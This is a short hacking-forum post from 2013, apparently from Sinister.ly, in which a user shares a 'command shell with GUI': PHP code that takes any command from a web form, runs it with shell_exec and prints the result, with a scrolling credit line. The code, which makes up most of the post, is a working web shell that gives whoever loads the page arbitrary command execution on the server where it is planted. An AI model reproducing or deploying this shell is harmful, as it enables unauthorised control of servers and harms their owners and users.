Command shell with GUI. 06-28-2013, 02:50 AM
#1
I was bored, so I made a command shell that has a GUI, 100 percent leeched HTML.
Here is a screenshot.
![[Image: d0a7a91ea1.png]](http://puu.sh/3pYlV/d0a7a91ea1.png)
1337 scrolling text.
Code.
Here is a screenshot.
![[Image: d0a7a91ea1.png]](http://puu.sh/3pYlV/d0a7a91ea1.png)
1337 scrolling text.
Code.
Spoiler:
PHP Code:
<?php
function exec_cmd(){
if (isset($_POST['command'])){
$exc = $_POST['command']; echo shell_exec($exc);
}
}
?>
<form action='<?php echo $_SERVER["PHP_SELF"]?>' method='post'>
<input type= 'text' name='command' />
<input type='submit' />
</form>
<?php exec_cmd();?>
<marquee behavior="slide" direction="left">Kirito's command shell. - Sinister.ly</marquee>




![[+]](https://sinister.li/images/modern/collapse_collapsed.png)

















![[Image: tenor.gif]](https://media.tenor.com/images/40e171e6954998e4c640c1a106cd238c/tenor.gif)
